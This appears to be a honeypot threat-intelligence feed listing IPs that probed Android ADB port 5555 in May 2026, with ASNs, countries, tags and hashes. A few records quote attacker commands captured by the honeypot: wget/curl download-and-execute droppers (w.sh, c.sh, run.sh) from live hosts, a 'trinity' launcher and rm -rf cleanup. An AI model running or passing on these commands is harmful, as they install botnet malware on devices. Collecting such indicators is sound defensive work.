IPv4	218.205.95.160	Attacker IP • ADB / seen in ADBHoney; events=58; ports=5555; cc=CN; asn=56041; asn_org=China Mobile communications corporation; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=58 \| first_seen=2026-05-03T14:17:18.000Z \| last_seen=2026-05-03T14:30:55.416Z \| ports=5555 \| cc=CN \| asn=56041 \| org=China Mobile communications corporation \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257,76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-03
IPv4	67.205.150.42	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; cats=Not Suspicious Traffic; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-03T15:52:08.000Z \| last_seen=2026-05-03T15:53:13.167Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	77.83.240.70	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=US; asn=49870; asn_org=Alsycon B.V.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=2107 \| first_seen=2026-05-03T15:27:17.000Z \| last_seen=2026-05-29T03:35:03.779Z \| ports=5555 \| cc=US \| asn=49870 \| org=Alsycon B.V.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	121.190.85.48	Attacker IP • ADB / seen in ADBHoney; events=58; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=58 \| first_seen=2026-05-03T19:25:55.000Z \| last_seen=2026-05-03T19:37:59.578Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom \| related_hashes=63946c28efa919809c03be75a3937c4be80589a9df79cd1be72037d493b70857,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-03
IPv4	138.68.189.88	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=GB; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-03T20:58:57.000Z \| last_seen=2026-05-03T21:11:49.132Z \| ports=5555 \| cc=GB \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	183.232.212.197	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=9808; asn_org=China Mobile Communications Group Co., Ltd.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-03T20:15:50.000Z \| last_seen=2026-05-12T22:23:22.202Z \| ports=5555 \| cc=CN \| asn=9808 \| org=China Mobile Communications Group Co., Ltd.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-03
IPv4	83.168.69.197	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=PL; asn=202520; asn_org=SkyPass Solutions Sp. z.o.o.; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=92 \| first_seen=2026-05-04T00:29:29.000Z \| last_seen=2026-05-05T05:14:14.278Z \| ports=5555 \| cc=PL \| asn=202520 \| org=SkyPass Solutions Sp. z.o.o.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	64.62.197.47	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-04T01:21:40.000Z \| last_seen=2026-05-04T01:23:12.786Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	205.210.31.246	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=22 \| first_seen=2026-05-04T02:14:47.000Z \| last_seen=2026-05-04T02:26:20.958Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	31.40.208.191	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=RU; asn=201776; asn_org=Miranda-Media Ltd; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-04T02:16:29.000Z \| last_seen=2026-05-04T02:17:30.398Z \| ports=5555 \| cc=RU \| asn=201776 \| org=Miranda-Media Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	121.127.34.125	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=400587; asn_org=Ryamer, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-04T05:49:08.000Z \| last_seen=2026-05-05T05:34:33.305Z \| ports=5555 \| cc=US \| asn=400587 \| org=Ryamer, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	51.195.54.194	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=FR; asn=16276; asn_org=OVH SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-04T05:17:28.000Z \| last_seen=2026-05-04T05:18:37.144Z \| ports=5555 \| cc=FR \| asn=16276 \| org=OVH SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	73.127.166.69	Attacker IP • ADB / seen in ADBHoney; events=13; ports=5555; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=13 \| first_seen=2026-05-04T05:29:00.000Z \| last_seen=2026-05-04T05:39:05.404Z \| ports=5555 \| cc=US \| asn=7922 \| org=Comcast Cable Communications, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	45.142.193.169	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=RO; asn=214295; asn_org=Skynet Network Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=33 \| first_seen=2026-05-04T07:43:23.000Z \| last_seen=2026-05-30T08:52:04.000Z \| ports=5555 \| cc=RO \| asn=214295 \| org=Skynet Network Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	1.52.126.243	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=VN; asn=18403; asn_org=FPT Telecom Company; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://103.77.246.173:8888/w.sh; sh w.sh; curl http://103.77.246.173:8888/c.sh; sh c.sh; wget http://103.77.246.173:8888/wget." Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-04T11:14:09.000Z \| last_seen=2026-05-04T11:16:03.131Z \| ports=5555 \| cc=VN \| asn=18403 \| org=FPT Telecom Company	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	71.61.178.15	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=7922; asn_org=Comcast Cable Communications, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=7 \| first_seen=2026-05-04T11:45:17.000Z \| last_seen=2026-05-04T11:55:21.999Z \| ports=5555 \| cc=US \| asn=7922 \| org=Comcast Cable Communications, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	45.142.193.164	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=RO; asn=214295; asn_org=Skynet Network Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=37 \| first_seen=2026-05-04T12:15:29.000Z \| last_seen=2026-05-23T08:01:20.223Z \| ports=5555 \| cc=RO \| asn=214295 \| org=Skynet Network Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	195.178.110.204	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=BG; asn=48090; asn_org=Techoff Srv Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=34 \| first_seen=2026-05-04T13:24:53.000Z \| last_seen=2026-05-29T16:14:50.398Z \| ports=5555 \| cc=BG \| asn=48090 \| org=Techoff Srv Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	65.49.1.103	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-04T14:59:22.000Z \| last_seen=2026-05-04T15:00:24.462Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	2.26.252.153	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=210457; asn_org=Kyonix Networks Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-04T19:33:45.000Z \| last_seen=2026-05-04T19:34:49.686Z \| ports=5555 \| cc=US \| asn=210457 \| org=Kyonix Networks Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	218.205.95.162	Attacker IP • ADB / seen in ADBHoney; events=54; ports=5555; cc=CN; asn=56041; asn_org=China Mobile communications corporation; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity" Observed in ADBHoney telemetry for 2026-05. events=114 \| first_seen=2026-05-04T19:03:14.000Z \| last_seen=2026-05-09T10:36:13.052Z \| ports=5555 \| cc=CN \| asn=56041 \| org=China Mobile communications corporation \| related_hashes=76ae6d577ba96b1c3a1de8b21c32a9faf6040f7e78d98269e0469d896c29dc64,a1b6223a3ecb37b9f7e4a52909a08d9fd8f8f80aee46466127ea0f078c7f5437,d7188b8c575367e10ea8b36ec7cca067ef6ce6d26ffa8c74b3faa0b14ebb8ff0,0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-04
IPv4	80.66.83.43	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=RU; asn=216473; asn_org=Bashinskii Vadim Ruslanovich; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=57 \| first_seen=2026-05-04T19:04:46.000Z \| last_seen=2026-05-30T22:18:16.479Z \| ports=5555 \| cc=RU \| asn=216473 \| org=Bashinskii Vadim Ruslanovich	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	111.8.44.215	Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=CN; asn=56047; asn_org=China Mobile communications corporation; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=3 \| first_seen=2026-05-04T20:02:17.000Z \| last_seen=2026-05-04T20:03:18.549Z \| ports=5555 \| cc=CN \| asn=56047 \| org=China Mobile communications corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	114.98.177.178	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=CN; asn=140527; asn_org=China Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=23 \| first_seen=2026-05-04T20:23:10.000Z \| last_seen=2026-05-19T02:05:43.474Z \| ports=5555 \| cc=CN \| asn=140527 \| org=China Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	176.65.139.101	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://176.65.139.20/w.sh; sh w.sh android.exploit; curl http://176.65.139.20/c.sh; sh c.sh android.exploit" Observed in ADBHoney telemetry for 2026-05. events=42 \| first_seen=2026-05-04T20:22:17.000Z \| last_seen=2026-05-06T18:52:46.217Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	147.185.132.42	Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=22 \| first_seen=2026-05-04T21:37:46.000Z \| last_seen=2026-05-04T21:49:18.536Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	158.173.46.147	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=DK; asn=212238; asn_org=Datacamp Limited; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-04T22:57:01.000Z \| last_seen=2026-05-04T23:07:09.478Z \| ports=5555 \| cc=DK \| asn=212238 \| org=Datacamp Limited	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-04
IPv4	91.230.168.104	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-04T23:06:47.000Z \| last_seen=2026-05-04T23:16:57.725Z \| ports=5555 \| cc=US \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	91.230.168.197	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-04T23:03:11.000Z \| last_seen=2026-05-04T23:04:18.329Z \| ports=5555 \| cc=US \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	91.230.168.204	Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-04T23:06:47.000Z \| last_seen=2026-05-04T23:17:05.679Z \| ports=5555 \| cc=US \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	143.244.161.231	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-05T02:14:21.000Z \| last_seen=2026-05-05T02:15:27.813Z \| ports=5555 \| cc=US \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	51.68.207.118	Attacker IP • ADB / seen in ADBHoney; events=158; ports=5555; cc=FR; asn=16276; asn_org=OVH SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=310 \| first_seen=2026-05-05T04:05:17.000Z \| last_seen=2026-05-30T12:28:48.561Z \| ports=5555 \| cc=FR \| asn=16276 \| org=OVH SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	79.164.42.70	Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=RU; asn=8615; asn_org=Central Telegraph Public Joint-stock Company; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=11 \| first_seen=2026-05-05T04:00:20.000Z \| last_seen=2026-05-05T04:01:32.806Z \| ports=5555 \| cc=RU \| asn=8615 \| org=Central Telegraph Public Joint-stock Company	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	175.213.151.146	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=14 \| first_seen=2026-05-05T05:22:48.000Z \| last_seen=2026-05-05T05:32:57.694Z \| ports=5555 \| cc=KR \| asn=4766 \| org=Korea Telecom	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	68.183.195.167	Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=CA; asn=14061; asn_org=DigitalOcean, LLC; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=18 \| first_seen=2026-05-05T05:19:03.000Z \| last_seen=2026-05-05T05:29:20.748Z \| ports=5555 \| cc=CA \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	45.142.193.6	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=RO; asn=214295; asn_org=Skynet Network Ltd; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-05T06:37:13.000Z \| last_seen=2026-05-23T07:24:34.617Z \| ports=5555 \| cc=RO \| asn=214295 \| org=Skynet Network Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	65.49.1.132	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=9 \| first_seen=2026-05-05T06:19:52.000Z \| last_seen=2026-05-05T06:30:01.658Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	65.49.1.140	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-05T06:19:10.000Z \| last_seen=2026-05-05T06:20:13.400Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	20.65.193.183	Attacker IP • ADB / seen in ADBHoney; events=25; ports=5555; cc=US; asn=8075; asn_org=Microsoft Corporation; cats=Detection of a Network Scan; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=25 \| first_seen=2026-05-05T08:36:08.000Z \| last_seen=2026-05-05T08:47:30.887Z \| ports=5555 \| cc=US \| asn=8075 \| org=Microsoft Corporation	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	60.188.43.138	Attacker IP • ADB / seen in ADBHoney; events=43; ports=5555; cc=CN; asn=4134; asn_org=Chinanet; cats=Generic Protocol Command Decode; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp/*" Observed in ADBHoney telemetry for 2026-05. events=43 \| first_seen=2026-05-05T08:02:12.000Z \| last_seen=2026-05-05T08:15:12.019Z \| ports=5555 \| cc=CN \| asn=4134 \| org=Chinanet \| related_hashes=0d3c687ffc30e185b836b99bd07fa2b0d460a090626f6bbbd40a95b98ea70257	scanning_host, nadsec, tpot, adbhoney, android, iot, dropper, malware-distribution	2026-05-05
IPv4	144.126.203.137	Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=GB; asn=14061; asn_org=DigitalOcean, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-05T12:28:08.000Z \| last_seen=2026-05-05T12:39:38.347Z \| ports=5555 \| cc=GB \| asn=14061 \| org=DigitalOcean, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	103.172.135.142	Attacker IP • ADB / seen in ADBHoney; events=40; ports=5555; cc=HK; asn=147002; asn_org=VMShell Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=40 \| first_seen=2026-05-05T13:36:44.000Z \| last_seen=2026-05-05T13:49:50.567Z \| ports=5555 \| cc=HK \| asn=147002 \| org=VMShell Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	184.105.247.220	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-05T14:54:44.000Z \| last_seen=2026-05-05T14:55:54.944Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	176.65.139.8	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=LU; asn=214472; asn_org=Offshore LC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=1894 \| first_seen=2026-05-03T21:02:39.000Z \| last_seen=2026-05-11T07:52:46.326Z \| ports=5555 \| cc=LU \| asn=214472 \| org=Offshore LC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	45.154.98.199	Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=NL; asn=210558; asn_org=1337 Services GmbH; adb_cmd_hits=0; cmd="cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd /; wget http://45.83.207.206/run.sh; curl -O http://45.83.207.206/run.sh; chmod 777 run.sh; sh run.sh; rm -r" Observed in ADBHoney telemetry for 2026-05. events=28 \| first_seen=2026-05-05T18:57:54.000Z \| last_seen=2026-05-10T17:47:31.601Z \| ports=5555 \| cc=NL \| asn=210558 \| org=1337 Services GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	100.29.192.84	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14618; asn_org=Amazon.com, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-05T21:03:08.000Z \| last_seen=2026-05-05T21:04:46.641Z \| ports=5555 \| cc=US \| asn=14618 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	44.220.188.74	Attacker IP • ADB / seen in ADBHoney; events=53; ports=5555; cc=US; asn=14618; asn_org=Amazon.com, Inc.; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=53 \| first_seen=2026-05-05T21:05:05.000Z \| last_seen=2026-05-05T21:15:49.532Z \| ports=5555 \| cc=US \| asn=14618 \| org=Amazon.com, Inc.	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	147.185.132.156	Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=396982; asn_org=Google LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=23 \| first_seen=2026-05-05T22:38:34.000Z \| last_seen=2026-05-05T22:50:26.812Z \| ports=5555 \| cc=US \| asn=396982 \| org=Google LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-05
IPv4	66.167.166.55	Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=PK; asn=9541; asn_org=Cyber Internet Services Pvt Ltd.; cats=Attempted Administrator Privilege Gain; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=11 \| first_seen=2026-05-05T23:55:12.000Z \| last_seen=2026-05-06T00:05:30.625Z \| ports=5555 \| cc=PK \| asn=9541 \| org=Cyber Internet Services Pvt Ltd.	malware_hosting, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	107.219.139.4	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=7018; asn_org=AT&T Enterprises, LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=5 \| first_seen=2026-05-06T00:14:49.000Z \| last_seen=2026-05-06T00:16:25.523Z \| ports=5555 \| cc=US \| asn=7018 \| org=AT&T Enterprises, LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	64.62.197.77	Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=16 \| first_seen=2026-05-06T01:23:43.000Z \| last_seen=2026-05-07T16:06:31.828Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	64.62.197.83	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=Hurricane Electric LLC; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-06T01:22:58.000Z \| last_seen=2026-05-06T01:24:00.634Z \| ports=5555 \| cc=US \| asn=6939 \| org=Hurricane Electric LLC	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	91.231.89.154	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-06T01:57:50.000Z \| last_seen=2026-05-06T02:08:11.112Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	91.231.89.159	Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=8 \| first_seen=2026-05-06T01:57:50.000Z \| last_seen=2026-05-06T02:07:54.165Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	91.231.89.206	Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=FR; asn=213412; asn_org=ONYPHE SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=20 \| first_seen=2026-05-06T01:53:52.000Z \| last_seen=2026-05-27T02:06:22.094Z \| ports=5555 \| cc=FR \| asn=213412 \| org=ONYPHE SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	185.141.119.59	Attacker IP • ADB / seen in ADBHoney; events=19; ports=5555; cc=US; asn=207990; asn_org=HostRoyale Technologies Pvt Ltd; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=93 \| first_seen=2026-05-06T06:07:29.000Z \| last_seen=2026-05-11T23:14:14.016Z \| ports=5555 \| cc=US \| asn=207990 \| org=HostRoyale Technologies Pvt Ltd	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	37.44.238.107	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=FR; asn=34534; asn_org=Fbw Networks SAS; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-06T06:45:45.000Z \| last_seen=2026-05-06T06:46:47.446Z \| ports=5555 \| cc=FR \| asn=34534 \| org=Fbw Networks SAS	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	37.60.236.26	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=FR; asn=51167; asn_org=Contabo GmbH; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-06T08:22:26.000Z \| last_seen=2026-05-06T08:23:30.127Z \| ports=5555 \| cc=FR \| asn=51167 \| org=Contabo GmbH	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	14.152.90.229	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=134763; asn_org=CHINANET Guangdong province network; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-06T09:37:53.000Z \| last_seen=2026-05-06T09:38:54.748Z \| ports=5555 \| cc=CN \| asn=134763 \| org=CHINANET Guangdong province network	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
IPv4	173.198.143.162	Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=11427; asn_org=Charter Communications Inc; cats=Generic Protocol Command Decode; adb_cmd_hits=0 Observed in ADBHoney telemetry for 2026-05. events=4 \| first_seen=2026-05-06T09:41:51.000Z \| last_seen=2026-05-06T09:43:01.577Z \| ports=5555 \| cc=US \| asn=11427 \| org=Charter Communications Inc	scanning_host, nadsec, tpot, adbhoney, android, iot	2026-05-06
